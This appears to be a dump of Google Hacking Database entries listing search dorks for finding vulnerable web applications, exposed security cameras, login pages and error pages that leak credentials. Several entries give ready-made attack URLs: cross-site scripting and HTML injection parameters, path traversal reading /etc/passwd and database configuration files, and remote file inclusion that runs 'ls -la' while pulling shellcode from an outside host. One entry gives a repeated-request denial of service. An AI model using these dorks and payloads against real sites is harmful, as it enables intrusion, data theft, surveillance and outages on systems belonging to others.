but it seems you cannot use url params, example: <br> http://[target]/[path]/w.exe?y=http://johnny.ihackstuff.com <br> <br> <br> inurl:isis.exe ext:exe inurl:/*cgi*/ <br> (a login page) <br> <br> <br> inurl:shopclerk.exe ext:exe inurl:/*cgi*/ <br> xss:<br> http://[target]/[path]/cgi-bin/shopclerk.exe?Session=02453277000023&page=">[XSS HERE]<br> <br> inurl:fccgi.exe ext:exe inurl:/*cgi*/ <br> html injection:<br> http://[target]/[path]/cgi-bin/fccgi.exe?w3Exec=[html%20here]<!--&CMD=DETAIL&SUB=w3VM<br> <br> inurl:pboard.exe ext:exe inurl:/*cgi*/<br> http://[target]/[path]/cgi/pboard.exe?idno=">[XSS HERE]&page=1<br> <br> inurl:webstat.exe ext:exe inurl:/*cgi*/<br> http://[target]/[path]/webstat.exe?A=X&RA=[XSS HERE]<br> [descr]] [[url]http://www.google.com/search?hl=it&q=inurl%3A*.exe+ext%3Aexe+inurl%3A%2F*cgi*%2F&meta=&num=100&filter=0[url]] [[dork]inurl:*.exe ext:exe inurl:/*cgi*/[dork]] [end][1713]] [[start][1714] [[title]"powered by claroline" -demo[[title]] [[descr]this is for Claroline e-learning platform <= 1.7.4 multiple vulnerabilities<br> <br> advisory & poc exploit:<br> http://retrogod.altervista.org/claroline_174_incl_xpl.html[descr]] [[url]http://www.google.com/search?q=%22powered+by+claroline%22+-demo&num=100&hl=en&lr=&start=100&sa=N&filter=0[url]] [[dork]"powered by claroline" -demo[dork]] [end][1714]] [[start][1715] [[title]"PhpCollab . Log In" | "NetOffice . Log In" | (intitle:"index.of." intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)[[title]] [[descr]this is for PhpCollab 2.x / NetOffice 2.x sql injection<br> <br> http://retrogod.altervista.org/phpcollab_2x-netoffice_2x_sql_xpl.html[descr]] [[url]http://www.google.com/search?q=%22PhpCollab+.+Log+In%22+%7C+%22NetOffice+.+Log+In%22+%7C+(intitle:%22index.of.%22+intitle:phpcollab%7Cnetoffice+inurl:phpcollab%7Cnetoffice+-gentoo)+&num=100&hl=en&lr=&start=&sa=N&filter=0[url]] [[dork]"PhpCollab . Log In" | "NetOffice . Log In" | (intitle:"index.of." 
intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo) [dork]] [end][1715]] [[start][1718] [[title]"2004-2005 ReloadCMS Team."[title]] [[descr]this is for ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution vulnerability, poc exploit:<br> <br> http://retrogod.altervista.org/reloadcms_125_xpl.html[descr]] [[url]http://www.google.com/search?hl=en&q=intext%3A%222000-2001+The+phpHeaven+Team%22+-sourceforge+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]] [[dork]intext:"2000-2001 The phpHeaven Team" -sourceforge [dork]] [end][1718]] [[start][1719] [[title]inurl:/counter/index.php intitle:"+PHPCounter 7.*"[title]] [[descr]This is an online vulnerable web stat program called PHPCounter 7.<br> <br> http://www.clydebelt.org.uk/counter/help.html <br> <br> It has several public vulnerabilities in versions 7.1 and 7.2 that include cross site scripting and unauthorized information disclosure.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1719]] [[start][1720] [[title]intext:"2000-2001 The phpHeaven Team" -sourceforge[[title]] [[descr]intext:"2000-2001 The phpHeaven Team" -sourceforge <br> <br> this is for PHPMyChat remote commands execution,<br> advisory/poc exploits:<br> <br> http://retrogod.altervista.org/phpmychat_0145_xpl.html<br> http://retrogod.altervista.org/phpmychat_015dev_xpl.html[descr]] [[url]http://www.google.com/search?q=intext:%222000-2001+The+phpHeaven+Team%22+-sourceforge&num=100&hl=en&lr=&start=0&sa=N&filter=0[url]] [[dork]intext:"2000-2001 The phpHeaven Team" -sourceforge[dork]] [end][1720]] [[start][1721] [[title]inurl:server.php ext:php intext:"No SQL" -Released[[title]] [[descr]vulnerability<br> discovered by Secunia, quick reference:<br> <br> http://www.securityfocus.com/bid/16187<br> <br> an example of exploit for PHPOpenChat:<br> <br> http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.html<br> <br> a DOS exploit:<br> <br> http://retrogod.altervista.org/adodb_dos.html<br> <br> <br> <br> <br> [descr]] 
[[url]http://www.google.com/search?q=inurl:server.php+ext:php++intext:%22No+SQL%22+-Released&num=100&hl=en&lr=&start=0&sa=N&filter=0[url]] [[dork]inurl:server.php ext:php intext:"No SQL" -Released[dork]] [end][1721]] [[start][1722] [[title]intitle:PHPOpenChat inurl:"index.php?language="[title]] [[descr]exploit:<br> <br> http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.html<br> <br> also, information disclosure:<br> <br> http://[target]/[path]/include/adodb/tests/tmssql.php?do=phpinfo<br> <br> and denial of service on some windows system, multiple requests of:<br> <br> http://[target]/[path]/include/adodb/tests/tmssql.php?do=closelog<br> [descr]] [[url]http://www.google.com/search?q=intitle:PHPOpenChat+inurl:%22index.php%3Flanguage%3D%22+&num=100&hl=it&lr=&start=0&sa=N&filter=0[url]] [[dork]intitle:PHPOpenChat inurl:"index.php?language=" [dork]] [end][1722]] [[start][1723] [[title]"powered by phplist" | inurl:"lists/?p=subscribe" | inurl:"lists/index.php?p=subscribe" -ubbi -bugs +phplist -tincan.co.uk[[title]] [[descr]this is for PHPList 2.10.2 arbitrary local inclusion, discovered by me:<br> <br> advisory/poc exploit: <br> http://retrogod.altervista.org/phplist_2102_incl_xpl.html [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22powered+by+phplist%22+%7C+inurl%3A%22lists%2F%3Fp%3Dsubscribe%22+%7C+inurl%3A%22lists%2Findex.php%3Fp%3Dsubscribe%22+-ubbi+-bugs+%2Bphplist+-tincan.co.uk[url]] [[dork]"powered by phplist" | inurl:"lists/?p=subscribe" | inurl:"lists/index.php?p=subscribe" -ubbi -bugs +phplist -tincan.co.uk[dork]] [end][1723]] [[start][1726] [[title]"powered by sphider" -exploit -ihackstuff -www.cs.ioc.ee[[title]] [[descr]dork: <br> "powered by sphider" <br> <br> a vulnerable search engine script <br> <br> arbitrary remote inclusion, poc: <br> <br> http://[target]/[path]/admin/configset.php?cmd=ls%20-la&settings_dir=http://somehost.com <br> <br> where on somehost.com you have a shellcode in <br> /conf.php/index.html <br> <br> 
references:<br> http://retrogod.altervista.org/sphider_13_xpl_pl.html<br> http://secunia.com/advisories/19642/ [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22powered+by+sphider%22+-exploit+-ihackstuff+-www.cs.ioc.ee[url]] [[dork]"powered by sphider" -exploit -ihackstuff -www.cs.ioc.ee[dork]] [end][1726]] [[start][1727] [[title]"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"[title]] [[descr]dork: <br> <br> "by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta" <br> <br> this is for the PHP Web Statistik script, you can go to: <br> <br> http://[target]/[path_to]/log/logdb.dta to see clear text logs <br> [descr]] [[url]http://www.google.com/search?hl=en&q=%22by+Reimar+Hoven.+All+Rights+Reserved.+Disclaimer%22+%7C+inurl%3A%22log%2Flogdb.dta%22+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]] [[dork]"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta" [dork]] [end][1727]] [[start][1728] [[title]inurl:"extras/update.php" intext:mysql.php -display[[title]] [[descr]this is an osCommerce dork:<br> <br> inurl:"extras/update.php" intext:mysql.php -display <br> <br> or more simply: <br> <br> inurl:"extras/update.php" -display (this displays some more hosts where error_reporting=0) <br> <br> I found this simple exploit, if the extras/ folder is inside the www path, you can view all files on the target system, including php files and so on, ex: <br> <br> http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php <br> <br> http://[target]/[path]/extras/update.php?read_me=0&readme_file=../index.php <br> <br> http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/fstab <br> <br> also, if you succeed in viewing the configure script with database details, you can connect to it through some <br> test scripts inside this folder...<br> <br> now I read this:<br> http://www.securityfocus.com/bid/14294/info<br> <br> this is actually unpatched/unresolved in 2.2 on Apr 2006[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%22extras%2Fupdate.php%22+intext%3Amysql.php+-display+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]] [[dork]inurl:"extras/update.php" intext:mysql.php -display [dork]] [end][1728]] [[start][1729] [[title]inurl:sysinfo.cgi ext:cgi[[title]] [[descr]dork:<br> inurl:sysinfo.cgi ext:cgi <br> <br> exploit: <br> http://www.milw0rm.com/exploits/1677 <br> <br> I found this command execution vulnerability in 1.2.1 <br> but other versions may be vulnerable too<br> <br> however, you can see the version in google results[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3Asysinfo.cgi+ext%3Acgi+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]] [[dork]inurl:sysinfo.cgi ext:cgi [dork]] [end][1729]] [[start][1731] [[title]inurl:perldiver.cgi ext:cgi[[title]] [[descr]dork: <br> <br> inurl:perldiver.cgi ext:cgi <br> <br> some interesting info about the server and a cross site <br> scripting vulnerability, poc: <br> <br> http://[target]/[path]/cgi-bin/perldiver.cgi?action=20&alert("lol")<br> <br> other reference:<br> http://secunia.com/advisories/16888/[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3Aperldiver.cgi+ext%3Acgi+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]] [[dork]inurl:perldiver.cgi ext:cgi [dork]] [end][1731]] [[start][1732] [[title]inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk[[title]] [[descr]dork:<br> <br> inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk<br> <br> a remote user can execute an arbitrary function (without arguments) example: <br> <br> http://[target]/[path]/tmssql.php?do=phpinfo <br> <br> reference:<br> http://www.osvdb.org/displayvuln.php?osvdb_id=22291 <br> <br> I also discovered that you can crash some win boxes / apache servers by sending<br> multiple requests of <br> <br> http://[target]/[path]/tmssql.php?do=closelog<br> <br> see:<br> <br> http://www.milw0rm.com/exploits/1651[descr]] 
[[url]http://www.google.com/search?q=inurl:tmssql.php+ext:php+mssql+pear+adodb++-cvs+-akbk&num=100&hl=en&lr=&start=0&sa=N&filter=0[url]] [[dork]inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk[dork]] [end][1732]] [[start][1733] [[title]"powered by php photo album" | inurl:"main.php?cmd=album" -demo2 -pitanje[[title]] [[descr]dork: <br> <br> "powered by php photo album" | inurl:"main.php?cmd=album" -demo2 -pitanje <br> <br> <br> poc: <br> if register_globals = On & magic_quotes_gpc = Off <br> <br> http://[target]/[path]/language.php?data_dir=/etc/passwd%00 <br> <br> on, php5, if register_globals = on: <br> <br> http://[target]/[path]/language.php?cmd=ls%20-la&data_dir=ftp://Anonymous:fakemail.co&#109;&#064;&#115;omehost.com/public/ <br> <br> where on ftp you have a translation.dat file with shellcode inside <br> <br> <br> <br> references:<br> <br> http://retrogod.altervista.org/phpalbum_0323_incl_xpl.html <br> http://www.securityfocus.com/bid/17526 <br> [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22powered+by+php+photo+album%22+%7C+inurl%3A%22main.php%3Fcmd%3Dalbum%22+-demo2+-pitanje+&filter=0[url]] [[dork]"powered by php photo album" | inurl:"main.php?cmd=album" -demo2 -pitanje [dork]] [end][1733]] [[start][1734] [[title]intitle:"IVC Control Panel"[title]] [[descr]this searches for security cameras, vendor site:<br> http://www.ivcco.com/[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22IVC+Control+Panel%22&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]] [[dork]intitle:"IVC Control Panel"[dork]] [end][1734]] [[start][1735] [[title](intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)[[title]] [[descr]more cams...<br> <br> vendor site: http://www.mobotix.com/layout/set/index/language/index[descr]] [[url]http://www.google.com/search?q=(intitle:MOBOTIX+intitle:PDAS)+%7C+(intitle:MOBOTIX+intitle:Seiten)+%7C+(inurl:/pda/index.html+%2Bcamera)&num=100&hl=en&lr=&filter=0[url]] 
[[dork](intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)[dork]] [end][1735]] [[start][1737] [[title]intitle:"MvBlog powered"[title]] [[descr]MvBlog is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.<br> <br> The application is prone to HTML-injection and SQL-injection vulnerabilities. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. Arbitrary script code may also be executed in the browser of an unsuspecting user in the context of the affected site; this may help the attacker steal cookie-based authentication credentials and launch other attacks.<br> <br> http://www.securityfocus.com/bid/17481/discuss[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22MvBlog+powered%22&btnG=H%C4%BEada%C5%A5&meta=&num=100[url]] [[dork]intitle:"MvBlog powered"[dork]] [end][1737]] [[start][1738] [[title]intitle:"ShowIt-Admin"[title]] [[descr]it seems to be some application for managing pictures at a web site. unfortunately I don't speak German.<br> <br> http://www.suedweb.de/content_showit/<br> <br> something interesting here:<br> <br> http://[target]/[path]/admin/phpinfo.php[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22ShowIt-Admin%22&btnG=H%C4%BEada%C5%A5&meta=&num=100[url]] [[dork]intitle:"ShowIt-Admin"[dork]] [end][1738]] [[start][1739] [[title]"powered by active php bookmarks" | inurl:bookmarks/view_group.php?id=[[title]] [[descr]Active PHP Bookmarks, a web based bookmark manager, was originally developed by Brandon Stone. Due to lack of time he has withdrawn himself from the project, however keeping his development forum on-line. On December 3rd 2004 this APB-forum, which was still the home of a small but relatively active community, was compromised. 
All content of the forum was lost, including links to important user contributed patches for the APB code.<br> <br> exploit (i haven't tested it)<br> http://www.securityfocus.com/archive/1/305392<br> <br> my version of exploit<br> http://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps[descr]] [[url]http://www.google.com/search?hl=en&q=%22powered+by+active+php+bookmarks%22+%7C+inurl%3Abookmarks%2Fview_group.php%3Fid%3D&btnG=H%C4%BEada%C5%A5+v+Google&meta=&num=100[url]] [[dork]"powered by active php bookmarks" | inurl:bookmarks/view_group.php?id=[dork]] [end][1739]] [[start][1740] [[title]Please enter a valid password! inurl:polladmin[[title]] [[descr]The PHP Poll Wizard 2 is a powerful and easy-to-use PHP-Script for creating and managing polls.<br> <br> more generic dork:<br> "Powered by PHP Poll Wizard" | intitle:"php poll wizard" [descr]] [[url]http://www.google.com/search?hl=en&q=Please+enter+a+valid+password%21+inurl%3Apolladmin&btnG=H%C4%BEada%C5%A5&meta=[url]] [[dork]Please enter a valid password! inurl:polladmin[dork]] [end][1740]] [[start][1741] [[title]"Warning: Division by zero in" "on line" -forum[[title]] [[descr]Just another error that reveals full paths.[descr]] [[url]http://www.google.com/search?q=%22Warning:+Division+by+zero+in%22+%22on+line%22+-forum&num=100&hl=en&lr=&start=0&sa=N[url]] [[dork]"Warning: Division by zero in" "on line" -forum[dork]] [end][1741]] [[start][1742] [[title]inurl:resetcore.php ext:php[[title]] [[descr]e107 is a content management system written in php and using the popular open source mySQL database system for content storage. 
It's completely free and totally customisable, and in constant development.<br> <br> rgods exploit:<br> http://retrogod.altervista.org/e107remote.html<br> [descr]] [[url]http://www.google.com/search?q=%22Warning:+Division+by+zero+in%22+%22on+line%22+-forum&num=100&hl=en&lr=&start=0&sa=N[url]] [[dork]"Warning: Division by zero in" "on line" -forum[dork]] [end][1742]] [[start][1743] [[title]"Warning: mysql_connect(): Access denied for user: '&#042;&#064;&#042;" "on line" -help -forum[[title]] [[descr]This dork reveals logins to databases that were denied for some reason.<br> [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22Warning%3A+mysql_connect%28%29%3A+Access+denied+for+user%3A+%27*%40*%22+%22on+line%22++-help+-forum&btnG=Search[url]] [[dork]"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum[dork]] [end][1743]] [[start][1744] [[title]"Warning:" "failed to open stream: HTTP request failed" "on line"[title]] [[descr]Just another error message.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22Warning%3A%22+%22failed+to+open+stream%3A+HTTP+request+failed%22+%22on+line%22+&btnG=Search[url]] [[dork]"Warning:" "failed to open stream: HTTP request failed" "on line" [dork]] [end][1744]] [[start][1745] [[title]"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum[[title]] [[descr]and another error. 
open it from cache when not working.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22Warning%3A+Bad+arguments+to+%28join%7Cimplode%29+%28%29+in%22+%22on+line%22+-help+-forum&btnG=Search[url]] [[dork]"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum[dork]] [end][1745]] [[start][1746] [[title]"Unable to jump to row" "on MySQL result index" "on line"[title]] [[descr]another error message[descr]] [[url]http://www.google.com/search?q=%22Unable+to+jump+to+row%22+%22on+MySQL+result+index%22+%22on+line%22&num=100&hl=en&lr=&start=0&sa=N[url]] [[dork]"Unable to jump to row" "on MySQL result index" "on line"[dork]] [end][1746]] [[start][1747] [[title]"This script was created by Php-ZeroNet" "Script . Php-ZeroNet"[title]] [[descr]Php-ZeroNet is a script comprised of php allowing webmasters to start an online community. Php-ZeroNet features Content Management, News posting, User CP, interactive system, etc. Php-ZeroNet uses a wide range of different cases in its script, it can adapt<br> <br> my exploit:<br> http://fr0zen.no-ip.org/phpnetzero-1.2.1_xpl.phps[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22This+script+was+created+by+Php-ZeroNet%22+%22Script+.+Php-ZeroNet%22+&btnG=Search[url]] [[dork]"This script was created by Php-ZeroNet" "Script . Php-ZeroNet" [dork]] [end][1747]]
[[start][1748] [[title]inurl:"login.php" "powered by WebChat"[title]] [[descr]WebChat is a chat application for JavaScript compatible web browsers made in PHP. [descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3A%22login.php%22+%22powered+by+WebChat%22&btnG=H%C4%BEada%C5%A5&meta=&num=100[url]] [[dork]inurl:"login.php" "powered by WebChat"[dork]] [end][1748]] [[start][1749] [[title]"delivered by mailman" inurl:admin/mailman | intitle:"Mailman Administrator Authentication"[title]] [[descr]Mailman is free software for managing electronic mail discussion and e-newsletter lists. Mailman is integrated with the web, making it easy for users to manage their accounts and for list owners to administer their lists. Mailman supports built-in archiving, automatic bounce processing, content filtering, digest delivery, spam filters, and more. <br> <br> an interesting vulnerability:<br> http://www.gnu.org/software/mailman/security.html<br> http://lists.grok.org.uk/pipermail/full-disclosure/2005-February/031562.html<br> http://www.securityspace.com/smysecure/catid.html?id=16339 [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22delivered+by+mailman%22+inurl%3Aadmin%2Fmailman+%7C+intitle%3A%22Mailman+Administrator+Authentication%22+&btnG=Search[url]] [[dork]"delivered by mailman" inurl:admin/mailman | intitle:"Mailman Administrator Authentication" [dork]] [end][1749]] [[start][1750] [[title]intitle:"php upload to my ftp" "PHP Upload To My FTP"[title]] [[descr]some script that allows uploading files to a web server. 
[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22php+upload+to+my+ftp%22+%22PHP+Upload+To+My+FTP%22+&btnG=H%C4%BEada%C5%A5&meta=&num=100[url]] [[dork]intitle:"php upload to my ftp" "PHP Upload To My FTP" [dork]] [end][1750]] [[start][1751] [[title]"You have not provided a survey identification number" ERROR -xoops.org "please contact"[title]] [[descr]sql injection:<br> http://www.securityfocus.com/bid/16077/discuss<br> <br> remote command execution:<br> http://retrogod.altervista.org/phpsurveyor_0995_xpl.html<br> <br> [descr]] [[url]http://www.google.com/search?num=100&hl=en&q=phpsurveyor+%22%5BExit+and+Clear+Survey%5D%22&btnG=H%C4%BEada%C5%A5&meta=[url]] [[dork]phpsurveyor "[Exit and Clear Survey]"[dork]] [end][1751]] [[start][1752] [[title]"Cannot use a scalar value as an array in" "on line" -issues -help -problem[[title]] [[descr]another error message[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=%22Cannot+use+a+scalar+value+as+an+array+in%22+%22on+line%22+-issues+-help+-problem&btnG=H%C4%BEada%C5%A5&meta=[url]] [[dork]"Cannot use a scalar value as an array in" "on line" -issues -help -problem[dork]] [end][1752]] [[start][1753] [[title]intitle:"HelpDesk" "If you need additional help, please email helpdesk at"[title]] [[descr]it's another helpdesk application.<br> <br> my exploit:<br> http://fr0zen.no-ip.org/phphelpdesk-0.6.16_rcxcn_xpl.phps[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=intitle%3A%22HelpDesk%22+%22If+you+need+additional+help%2C+please+email+helpdesk+at%22&btnG=H%C4%BEada%C5%A5&meta=[url]] [[dork]intitle:"HelpDesk" "If you need additional help, please email helpdesk at"[dork]] [end][1753]] [[start][1756] [[title]inurl:database.php | inurl:info_db.php ext:php "Database V2.*" "Burning Board *"[title]] [[descr]this is for Woltlab Burning Board 2.x (Datenbank MOD fileid)<br> <br> exploit:<br> http://seclists.org/lists/bugtraq/2006/Mar/0058.html[descr]] 
[[url]http://www.google.com/search?hl=en&q=inurl%3Adatabase.php+%7C+inurl%3Ainfo_db.php+ext%3Aphp+%22Database+V2.*%22+%22Burning+Board+*%22[url]] [[dork]inurl:database.php | inurl:info_db.php ext:php "Database V2.*" "Burning Board *"[dork]] [end][1756]] [[start][1757] [[title]inurl:"php121login.php"[title]] [[descr]"PHP121 is a free web based instant messenger - written entirely in PHP. This means that it will work in any browser on any operating system including Windows and Linux, anywhere!" [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3A%22php121login.php%22&btnG=Search[url]] [[dork]inurl:"php121login.php"[dork]] [end][1757]] [[start][1758] [[title]"The statistics were last updated" "Daily"-microsoft.com[[title]] [[descr]Results include many various network activity logs[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22The+statistics+were+last+updated%22+%22Daily%22-microsoft.com&btnG=Search[url]] [[dork]"The statistics were last updated" "Daily"-microsoft.com[dork]] [end][1758]] [[start][1759] [[title](intitle:"phpop: login")|(intext:"You have attempted an action that requires you to be authenticated.")|(intitle:"bookmarker: login")[[title]] [[descr]Background - "phpop was written to solve a very simple problem for me - How do I send and receive e-mail when all I have is a web browser." 
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22phpop%3A+login%22%29%7C%28intext%3A%22You+have+attempted+an+action+that+requires+you+to+be+authenticated.%22%29%7C%28intitle%3A%22bookmarker%3A+login%22%29&btnG=Search[url]] [[dork](intitle:"phpop: login")|(intext:"You have attempted an action that requires you to be authenticated.")|(intitle:"bookmarker: login")[dork]] [end][1759]] [[start][1760] [[title]intitle:"Employee Intranet Login"[title]] [[descr]Intranet login pages by decentrix.com[descr]] [[url]http://www.google.com/search?q=intitle:%22Employee+Intranet+Login%22&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork]intitle:"Employee Intranet Login"[dork]] [end][1760]] [[start][1761] [[title]intitle:"Uploader - Uploader v6" -pixloads.com[[title]] [[descr]File upload servers, dangerous if used in combination with mytrashmail.com[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22Uploader+-+Uploader+v6%22+-pixloads.com&btnG=Search[url]] [[dork]intitle:"Uploader - Uploader v6" -pixloads.com[dork]] [end][1761]] [[start][1762] [[title]inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"[title]] [[descr]Customer login pages<br> <br> "SalesLogix is the Customer Relationship Management Solution that drives sales performance in small to Medium-sized businesses through Sales, Marketing, and Customer Support automation and back-office<br> integration." 
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3A%22%2Fslxweb.dll%2Fexternal%3Fname%3D%28custportal%7Cwebticketcust%29%22&btnG=Search[url]] [[dork]inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"[dork]] [end][1762]] [[start][1763] [[title](intitle:"Please login - Forums powered by WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")[[title]] [[descr]"WWWthreads is a high powered, full scalable, customizable open source bulletin board package that you will be able to modify to your specific topics, users, and needs. WWWthreads has an extremely comprehensive interface, a very simple administration panel for quick set up and management, as well as a frequently asked questions to help guide you through the process should you hit any snags or have any questions."descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22Please+login+-+Forums+powered+by+WWWThreads%22%29%7C%28inurl%3A%22wwwthreads%2Flogin.php%22%29%7C%28inurl%3A%22wwwthreads%2Flogin.pl%3FCat%3D%22%29&btnG=Search[url]] [[dork](intitle:"Please login - Forums powered by WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")[dork]] [end][1763]] [[start][1764] [[title]intitle:"Apache Status" "Apache Server Status for"[title]] [[descr]New Apache Server Status Dork[descr]] [[url]http://www.google.com/search?q=intitle:%22Apache+Status%22+%22Apache+Server+Status+for%22&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork]intitle:"Apache Status" "Apache Server Status for"[dork]] [end][1764]] [[start][1765] [[title](intitle:"rymo Login")|(intext:"Welcome to rymo") -family[[title]] [[descr]"rymo is a small but reliable webmail gateway. It contacts a POP3-server for mail reading and uses the PHP-internal mail functions for mail sending." 
[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1765]] [[start][1766] [[title]intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com[[title]] [[descr]"TrackerCam® is a software application that lets you put your webcam on the web, use it for surveillance, and do things like access its video from a cell phone or upload its images to an FTP-server." [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%28%22TrackerCam+Live+Video%22%29%7C%28%22TrackerCam+Application+Login%22%29%7C%28%22Trackercam+Remote%22%29+-trackercam.com&btnG=Search[url]] [[dork]intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com[dork]] [end][1766]] [[start][1767] [[title]"SquirrelMail version" "By the SquirrelMail Development Team"[title]] [[descr]More SquirrelMail Logins[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22SquirrelMail+version%22+%22By+the+SquirrelMail+Development+Team%22&btnG=Search[url]] [[dork]"SquirrelMail version" "By the SquirrelMail Development Team"[dork]] [end][1767]] [[start][1768] [[title]intitle:"TWIG Login"[title]] [[descr]"TWIG is a Web-based groupware suite written in PHP, compatible with both PHP3 and PHP4. Its features include IMAP and POP3 email, Usenet newsgroups, contact management, scheduling, shared notes and bookmarks, a todo list, and meeting announcements." [descr]] [[url]http://www.google.com/search?q=intitle%3A%22TWIG%20Login%22[url]] [[dork]intitle:"TWIG Login"[dork]] [end][1768]] [[start][1769] [[title]intitle:IMP inurl:imp/index.php3[[title]] [[descr]Webmail Login pages for IMP<br> <br> "IMP is a set of PHP scripts that implement an IMAP based webmail system. Assuming you have an account on a server that supports IMAP, you can use an installation of IMP to check your mail from anywhere that you have web access." 
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3AIMP+inurl%3Aimp%2Findex.php3&btnG=Search[url]] [[dork]intitle:IMP inurl:imp/index.php3[dork]] [end][1769]] [[start][1770] [[title](intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")[[title]] [[descr]SHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).
SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts. [descr]] [[url]http://www.google.com/search?q=(intitle:%22SHOUTcast+Administrator%22)%7C(intext:%22U+SHOUTcast+D.N.A.S.+Status%22)&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork](intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")[dork]] [end][1770]] [[start][1771] [[title]intitle:"SHOUTcast Administrator" inurl:admin.cgi[[title]] [[descr]Login pages for SHOUTcast
"SHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).
SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts. "[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22SHOUTcast+Administrator%22+inurl%3Aadmin.cgi&btnG=Search[url]] [[dork]intitle:"SHOUTcast Administrator" inurl:admin.cgi[dork]] [end][1771]] [[start][1772] [[title]intext:"Target Multicast Group" "beacon"[title]] [[descr]"...
Multicast Beacon is a multicast diagnostic tool written in Perl which uses the RTP protocol (RFC3550) to provide useful statistics and diagnostic information about a given multicast group's connectivity characteristics.
Multicast is a way of distributing IP packets to a set of machines which have expressed an interest in receiving them. It is a one-to-many distribution model suitable for video conferencing and other forms of data sharing over the network."
